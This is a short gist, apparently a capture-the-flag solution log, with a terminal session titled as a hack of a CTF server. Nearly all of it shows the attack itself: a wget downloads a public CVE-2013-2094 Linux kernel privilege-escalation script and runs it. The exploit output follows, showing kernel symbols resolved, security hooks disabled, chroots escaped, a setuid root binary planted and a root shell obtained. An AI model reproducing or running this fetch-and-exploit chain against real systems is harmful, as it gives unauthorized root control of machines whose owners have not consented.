Skip to content

Instantly share code, notes, and snippets.

@kusano
Created February 13, 2014 17:07
Show Gist options
  • Save kusano/8979286 to your computer and use it in GitHub Desktop.
Save kusano/8979286 to your computer and use it in GitHub Desktop.
How to hack ctfq.sweetduet.info:10022
[q13@localhost hack]$ wget https://raw.github.com/Pashkela/CVE-2013-2094/master/run.sh
--2014-02-14 02:05:38-- https://raw.github.com/Pashkela/CVE-2013-2094/master/run.sh
Resolving raw.github.com... 103.245.222.133
Connecting to raw.github.com|103.245.222.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80790 (79K) [text/plain]
Saving to: “run.sh”
100%[================================================>] 80,790 --.-K/s in 0.02s
2014-02-14 02:05:38 (4.16 MB/s) - “run.sh” saved [80790/80790]
[q13@localhost hack]$ sh run.sh
Compiling exp_abacus.c...OK.
[+] Resolved set_fs_root to 0xc0555cf0 (via System.map)
[+] Resolved set_fs_pwd to 0xc0555c90 (via System.map)
[+] Resolved __virt_addr_valid to 0xc0438b10 (via System.map)
[+] Resolved init_task to 0xc0a425e0 (via System.map)
[+] Resolved init_fs to 0xc0a58320 (via System.map)
[+] Resolved default_exec_domain to 0xc0a48480 (via System.map)
[+] Resolved bad_file_ops to 0xc0851e60 (via System.map)
[+] Resolved bad_file_aio_read to 0xc0545440 (via System.map)
[+] Resolved ima_audit to 0xc0c31904 (via System.map)
[+] Resolved ima_file_mmap to 0xc05c7660 (via System.map)
[+] Resolved ima_bprm_check to 0xc05c7630 (via System.map)
[+] Resolved ima_file_check to 0xc05c7600 (via System.map)
[+] Resolved selinux_enforcing to 0xc0c2f498 (via System.map)
[+] Resolved selinux_enabled to 0xc0a5d7a0 (via System.map)
[+] Resolved security_ops to 0xc0c2e450 (via System.map)
[+] Resolved default_security_ops to 0xc0a5b9c0 (via System.map)
[+] Resolved sel_read_enforce to 0xc05b5140 (via System.map)
[+] Resolved audit_enabled to 0xc0bfc944 (via System.map)
[+] Resolved commit_creds to 0xc047d9e0 (via System.map)
[+] Resolved prepare_kernel_cred to 0xc047de10 (via System.map)
[+] Resolved xen_start_info to 0xc0b57004 (via System.map)
[+] Resolved ptmx_fops to 0xc0c367a0 (via System.map)
[+] Resolved mark_rodata_ro to 0xc0433300 (via System.map)
[+] Resolved set_kernel_text_ro to 0xc04333d0 (via System.map)
[+] Resolved make_lowmem_page_readonly to 0xc04055a0 (via System.map)
[+] Resolved make_lowmem_page_readwrite to 0xc0405560 (via System.map)
[+] Resolved perf_swevent_enabled to 0xc0c26000 (via System.map)
[+] Resolved ptmx_fops to 0xc0c367a0 (via System.map)
[!] Array base is 0xc0c26000
[!] Detected structure size of 4 bytes
[!] Targeting 0xc0c367b0
[+] Got ring0!
[+] Detected 2.6/3.x style 8k stacks, with current at 0xdca51550 and cred support
[+] Disabled security of : nothing, what an insecure machine!
[+] Found ->fs offset at 0x3ac
[+] Broke out of any chroots or mnt namespaces
[+] Got root!
[+] UID 0, EUID:0 GID:0, EGID:0
[+] Run ./suid "ls -la;id":
total 96
drwxrwxr-x 2 q13 q13 4096 Feb 14 02:05 .
drwxrwx-wt. 15 root root 4096 Feb 14 02:05 ..
-rw-rw-r-- 1 q13 q13 80790 Feb 14 02:05 run.sh
-rwsrwsr-x 1 root root 4892 Feb 14 02:05 suid
uid=0(root) gid=0(root) groups=0(root)
[q13@localhost hack]$ ./suid sh
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),507(q13)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment